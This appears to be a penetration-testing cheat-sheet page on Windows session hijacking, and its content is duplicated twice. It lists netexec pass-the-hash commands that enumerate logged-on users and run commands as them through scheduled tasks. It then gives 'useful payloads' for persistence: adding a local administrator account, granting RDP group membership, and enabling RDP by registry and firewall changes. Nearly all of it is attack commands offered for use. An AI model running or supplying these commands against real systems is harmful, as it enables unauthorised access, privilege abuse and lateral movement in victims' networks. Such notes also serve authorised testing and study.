Session Hijack

Windows

Session hijacking in Windows is a powerfull and easy way to pivot deeper into the AD environment.

Find logged in users

## Remotely using `netexec`
$ netexec smb <target> -u Administrator -H :<pw-hash> --local-auth --loggedon-users
...
SMB         <target>   445    <hostname>   [+] Enumerated logged_on users
SMB         <target>   445    <hostname>   DOM\username             logon_server: DC.DOM.LOCAL

## Locally using cmd/powershell
> query user /server:127.0.0.1
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 void                  console             2  Active      none   2024-10-14 07:29

> qwinsta /server:127.0.0.1
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 console           void                      2  Active

Base command

## Execute command on target host
netexec smb <target> -u Administrator -H :<pw-hash> --local-auth -M schtask_as -o USER=<user-to-hijack> CMD="powershell.exe \"<command>\""

## Execute command on new target host
netexec smb <target> -u Administrator -H :<pw-hash> --local-auth -M schtask_as -o USER=<user-to-hijack> CMD="powershell.exe \"Invoke-Command -ComputerName <new-target-host> -ScriptBlock {<command>}\""

Usefull payloads

## Create new local user
net user <username> <password> /add

## Add to groups
net localgroup Administrators <username> /add
net localgroup 'Remote Desktop Users' <username> /add
net localgroup 'Remote Management Users' <username> /add

## Enable RDP
reg add 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name='allow RemoteDesktop' dir=in protocol=TCP localport=3389 action=allow

Web

Session cookies, find them and use them.

Last updated 6 months ago

Was this helpful?

Session Hijack

Windows

Session hijacking in Windows is a powerfull and easy way to pivot deeper into the AD environment.

Find logged in users

## Remotely using `netexec`
$ netexec smb <target> -u Administrator -H :<pw-hash> --local-auth --loggedon-users
...
SMB         <target>   445    <hostname>   [+] Enumerated logged_on users
SMB         <target>   445    <hostname>   DOM\username             logon_server: DC.DOM.LOCAL

## Locally using cmd/powershell
> query user /server:127.0.0.1
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 void                  console             2  Active      none   2024-10-14 07:29

> qwinsta /server:127.0.0.1
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 console           void                      2  Active

Base command

## Execute command on target host
netexec smb <target> -u Administrator -H :<pw-hash> --local-auth -M schtask_as -o USER=<user-to-hijack> CMD="powershell.exe \"<command>\""

## Execute command on new target host
netexec smb <target> -u Administrator -H :<pw-hash> --local-auth -M schtask_as -o USER=<user-to-hijack> CMD="powershell.exe \"Invoke-Command -ComputerName <new-target-host> -ScriptBlock {<command>}\""

Usefull payloads

## Create new local user
net user <username> <password> /add

## Add to groups
net localgroup Administrators <username> /add
net localgroup 'Remote Desktop Users' <username> /add
net localgroup 'Remote Management Users' <username> /add

## Enable RDP
reg add 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name='allow RemoteDesktop' dir=in protocol=TCP localport=3389 action=allow

Web

Session cookies, find them and use them.

Last updated 6 months ago

Was this helpful?